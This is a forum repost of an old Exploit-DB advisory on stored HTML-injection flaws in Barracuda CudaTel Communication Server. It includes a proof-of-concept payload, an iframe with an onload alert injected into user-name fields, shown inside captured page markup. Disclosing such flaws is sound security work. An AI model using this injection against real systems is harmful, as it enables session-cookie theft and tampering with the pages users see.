Exploit Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36931
Проверка EDB
  1. Пройдено
Автор
BENJAMIN KUNZ MEJRI
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
null
Дата публикации
2012-03-08
Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities
Код: 
source: https://www.securityfocus.com/bid/52358/info

Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected. 

<td class="detailTD">
<div style="float: left;" class="printedName">
"><iframe div="" <="" onload='alert("VL")' src="a">
</td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144', 
{"flag_super":"0","flag_locked":
"0","bbx_extension_rcd":"2012-02-16 
11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name":
"\"><iframe src=a onload=alert(\"vl\") 
<","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_
map_fallback_exten":null,"bbx_
extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_
row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE]
<","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_
forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id":

{"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value"
:"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF 
PERSISTENT SCRIPT CODE]
<","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
644
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda Web Application Firewall - Authentication Bypass
Ответы
0
Просмотры
698
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda SSL VPN 680 - 'returnTo' Open Redirection
Ответы
0
Просмотры
616
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities
Ответы
0
Просмотры
642
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda SSL VPN - 'fileSystem.do' Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
604
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda SSL VPN - 'launchAgent.do?return-To' Cross-Site Scripting
Ответы
0
Просмотры
621
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection
Ответы
0
Просмотры
590
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda Networks Message Archiver 650 - Persistent Cross-Site Scripting
Ответы
0
Просмотры
550
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda Web Application Firewall 660 - '/cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities
Ответы
0
Просмотры
579
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Barracuda Spam Firewall 3.3.x - 'preview_email.cgi?file' Arbitrary File Access
Ответы
0
Просмотры
646
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу